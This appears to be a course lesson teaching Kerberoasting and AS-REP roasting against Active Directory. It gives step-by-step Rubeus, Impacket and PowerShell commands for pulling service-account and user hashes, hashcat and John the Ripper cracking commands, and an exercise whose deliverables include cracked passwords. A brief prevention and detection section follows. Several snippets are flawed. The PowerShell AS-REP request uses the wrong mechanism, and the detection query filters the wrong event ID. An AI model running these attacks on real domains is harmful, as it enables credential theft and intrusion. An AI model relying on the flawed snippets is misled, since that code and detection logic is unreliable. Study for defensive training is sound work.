๐ฅ Lesson 3: Kerberoasting & AS-REP Roasting
Advanced credential harvesting techniques and hash cracking strategies
๐ Learning Objectives
By the end of this lesson, you will be able to:
- Master Kerberoasting attack methodology and techniques
- Execute AS-REP roasting attacks against vulnerable accounts
- Enumerate service accounts and identify high-value targets
- Implement effective hash cracking strategies
- Analyze attack artifacts and indicators
- Deploy comprehensive prevention and detection mechanisms
๐ฅ Kerberoasting Attack
What is Kerberoasting?
Kerberoasting is a credential harvesting attack that targets service accounts with Service Principal Names (SPNs). The attack exploits the fact that service tickets are encrypted with the service account's password hash, which can be cracked offline.
๐ Kerberoasting Key Characteristics:
- No Privileges Required: Any domain user can request service tickets
- Offline Cracking: Password hashes can be cracked without network access
- High Success Rate: Service accounts often have weak passwords
- Stealth Operation: Appears as normal Kerberos traffic
Kerberoasting Attack Process
1
๐ฏ Service Account Enumeration
Identify service accounts with SPNs
Enumeration Methods:
- LDAP queries for SPN attributes
- PowerShell Active Directory cmdlets
- Automated enumeration tools
- BloodHound analysis
2
๐ซ Service Ticket Request
Request service tickets for identified SPNs
Request Process:
- Use TGT to request service tickets
- Target high-value services (SQL, HTTP, etc.)
- Request tickets for multiple services
- Extract encrypted service tickets
3
๐ฅ Hash Extraction
Extract password hashes from service tickets
Extraction Methods:
- Parse Kerberos ticket data
- Extract encrypted service ticket portion
- Format hashes for cracking tools
- Organize by service account
4
๐จ Password Cracking
Crack service account passwords offline
Cracking Strategies:
- Dictionary attacks
- Brute force attacks
- Hybrid attacks
- Rule-based attacks
Kerberoasting Implementation
๐ง Using Rubeus
Modern C# implementation with advanced features
Command Syntax:
# Basic Kerberoasting
Rubeus.exe kerberoast
# Target specific user
Rubeus.exe kerberoast /user:sqlservice
# Output to file
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
# Use specific TGT
Rubeus.exe kerberoast /ticket:tgt.kirbi
# Kerberoast with password
Rubeus.exe kerberoast /password:Password123 /user:sqlservice
โก Using Impacket
Python-based implementation for cross-platform use
Command Syntax:
# Basic Kerberoasting
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10
# Request specific SPN
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10 -request-user sqlservice
# Output in hashcat format
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10 -outputfile hashes.txt
# Use Kerberos authentication
python GetUserSPNs.py -k -no-pass domain.com/sqlservice -dc-ip 192.168.1.10
๐ Using PowerShell
Native PowerShell implementation
Command Syntax:
# Enumerate SPNs
Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties ServicePrincipalName
# Request service tickets
$SPN = "MSSQLSvc/sql01.domain.com:1433"
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPN
# Extract ticket data
$TicketBytes = $Ticket.GetRequest()
๐ฅ AS-REP Roasting Attack
What is AS-REP Roasting?
AS-REP Roasting is a credential harvesting attack that targets user accounts with pre-authentication disabled. This allows attackers to request authentication responses without providing valid credentials, then crack the encrypted password hash offline.
๐ AS-REP Roasting Key Characteristics:
- Pre-authentication Disabled: Target accounts must have DONT_REQ_PREAUTH flag set
- No Credentials Required: Can request AS-REP without valid password
- Offline Cracking: Password hashes can be cracked without network access
- High-Value Targets: Often affects service and admin accounts
AS-REP Roasting Attack Process
1
๐ฏ Vulnerable Account Enumeration
Identify accounts with pre-authentication disabled
Enumeration Methods:
- LDAP queries for userAccountControl
- PowerShell Active Directory cmdlets
- Automated enumeration tools
- BloodHound analysis
2
๐ซ AS-REP Request
Request AS-REP without pre-authentication
Request Process:
- Send AS-REQ without pre-authentication data
- Target vulnerable user accounts
- Receive encrypted AS-REP response
- Extract encrypted password hash
3
๐ฅ Hash Extraction
Extract password hashes from AS-REP responses
Extraction Methods:
- Parse AS-REP Kerberos message
- Extract encrypted credential portion
- Format hashes for cracking tools
- Organize by user account
4
๐จ Password Cracking
Crack user account passwords offline
Cracking Strategies:
- Dictionary attacks
- Brute force attacks
- Hybrid attacks
- Rule-based attacks
AS-REP Roasting Implementation
๐ง Using Rubeus
Modern C# implementation with advanced features
Command Syntax:
# Basic AS-REP Roasting
Rubeus.exe asreproast
# Target specific user
Rubeus.exe asreproast /user:vulnerable_user
# Output to file
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
# Use specific domain controller
Rubeus.exe asreproast /dc:192.168.1.10
# AS-REP Roast with credentials
Rubeus.exe asreproast /user:vulnerable_user /password:Password123
โก Using Impacket
Python-based implementation for cross-platform use
Command Syntax:
# Basic AS-REP Roasting
python GetNPUsers.py domain.com/ -dc-ip 192.168.1.10
# Target specific user
python GetNPUsers.py domain.com/vulnerable_user -dc-ip 192.168.1.10
# Output in hashcat format
python GetNPUsers.py domain.com/ -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt
# Use Kerberos authentication
python GetNPUsers.py -k -no-pass domain.com/vulnerable_user -dc-ip 192.168.1.10
๐ Using PowerShell
Native PowerShell implementation
Command Syntax:
# Find vulnerable accounts
Get-ADUser -Filter {userAccountControl -band 4194304} -Properties userAccountControl
# Request AS-REP
$User = "vulnerable_user"
$ASREQ = [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]::new($User)
# Extract AS-REP data
$ASREPBytes = $ASREQ.GetRequest()
๐ฏ Target Identification and Prioritization
High-Value Service Accounts
๐๏ธ Database Services
SQL Server and database service accounts
High-Value SPNs:
- MSSQLSvc/* - SQL Server services
- Oracle/* - Oracle database services
- MySQL/* - MySQL database services
- PostgreSQL/* - PostgreSQL services
Impact:
- Database access and data exfiltration
- Lateral movement to other systems
- Privilege escalation opportunities
๐ Web Services
Web application and HTTP service accounts
High-Value SPNs:
- HTTP/* - Web server services
- HTTPS/* - Secure web services
- IIS/* - Internet Information Services
- Apache/* - Apache web servers
Impact:
- Web application access
- Configuration file access
- Code execution opportunities
๐ File Services
File sharing and storage service accounts
High-Value SPNs:
- CIFS/* - Common Internet File System
- SMB/* - Server Message Block
- NFS/* - Network File System
- SharePoint/* - SharePoint services
Impact:
- File system access
- Data exfiltration
- Share enumeration
๐ Authentication Services
Authentication and directory service accounts
High-Value SPNs:
- LDAP/* - Lightweight Directory Access Protocol
- AD/* - Active Directory services
- Kerberos/* - Kerberos authentication
- RADIUS/* - Remote Authentication Dial-In
Impact:
- Directory service access
- User enumeration
- Authentication bypass
๐จ Hash Cracking Strategies
Password Cracking Tools and Techniques
๐จ Hashcat
Advanced password recovery tool with GPU acceleration
Features:
- GPU-accelerated cracking
- Multiple attack modes
- Rule-based attacks
- Distributed cracking
Command Examples:
# Dictionary attack
hashcat -m 13100 hashes.txt wordlist.txt
# Brute force attack
hashcat -m 13100 hashes.txt -a 3 ?d?d?d?d?d?d?d?d
# Rule-based attack
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule
# Hybrid attack
hashcat -m 13100 hashes.txt -a 6 wordlist.txt ?d?d?d?d
โก John the Ripper
Fast password cracker with multiple modes
Features:
- Multiple hash formats
- Incremental attacks
- Wordlist attacks
- Custom rules
Command Examples:
# Basic cracking
john --wordlist=wordlist.txt hashes.txt
# Incremental attack
john --incremental hashes.txt
# Rule-based attack
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked passwords
john --show hashes.txt
๐ฏ Custom Wordlists
Targeted wordlists for specific environments
Wordlist Sources:
- Company-specific terms
- Industry terminology
- Common password patterns
- Leaked password databases
Wordlist Creation:
# Combine multiple wordlists
cat wordlist1.txt wordlist2.txt > combined.txt
# Add company-specific terms
echo "CompanyName2023" >> custom.txt
echo "Department2023" >> custom.txt
# Generate password variations
crunch 8 8 -t @@@@@@@@ -o patterns.txt
๐ก๏ธ Prevention and Detection
Defense Strategies
๐ Authentication Hardening
Implementation:
- Enable pre-authentication for all accounts
- Implement strong password policies
- Use managed service accounts
- Regular password rotation
- Multi-factor authentication
๐ Monitoring & Detection
Implementation:
- Monitor Kerberos authentication events
- Alert on unusual ticket requests
- Track failed authentication attempts
- Implement behavioral analysis
- Use SIEM integration
๐ง Configuration Security
Implementation:
- Review and harden SPN configurations
- Implement least privilege access
- Use group managed service accounts
- Regular security assessments
- Network segmentation
๐จ Incident Response
Implementation:
- Develop incident response procedures
- Implement automated response systems
- Regular security training
- Forensic analysis capabilities
- Threat hunting programs
๐งช Hands-On Exercise
Exercise: Kerberoasting and AS-REP Roasting Attack Simulation
Objective: Execute Kerberoasting and AS-REP roasting attacks in a controlled environment and implement detection mechanisms.
๐ Steps:
-
Environment Preparation
Set up the attack environment:
# Verify domain access whoami /all klist # Check current tickets Rubeus.exe klist # Verify domain information Get-ADDomain -
Service Account Enumeration
Identify service accounts with SPNs:
# Enumerate SPNs using PowerShell Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties ServicePrincipalName | Select-Object Name, ServicePrincipalName # Enumerate using LDAP ldapsearch -H ldap://domain.com -D "user@domain.com" -W -b "DC=domain,DC=com" "(&(objectClass=user)(servicePrincipalName=*))" servicePrincipalName -
Kerberoasting Attack
Execute Kerberoasting attack:
# Basic Kerberoasting Rubeus.exe kerberoast # Target specific service Rubeus.exe kerberoast /user:sqlservice # Output in hashcat format Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast_hashes.txt # Crack the hashes hashcat -m 13100 kerberoast_hashes.txt wordlist.txt -
AS-REP Roasting Attack
Execute AS-REP roasting attack:
# Find vulnerable accounts Get-ADUser -Filter {userAccountControl -band 4194304} -Properties userAccountControl # AS-REP Roasting Rubeus.exe asreproast # Target specific user Rubeus.exe asreproast /user:vulnerable_user # Output in hashcat format Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt -
Detection Implementation
Implement detection mechanisms:
# Monitor Kerberos events Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*TGS*"} # Check for pre-authentication failures Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4771} | Where-Object {$_.Message -like "*pre-auth*"}
๐ Deliverables:
- Kerberoasting attack demonstration
- AS-REP roasting attack demonstration
- Cracked password hashes
- Detection mechanism implementation
- Security recommendations report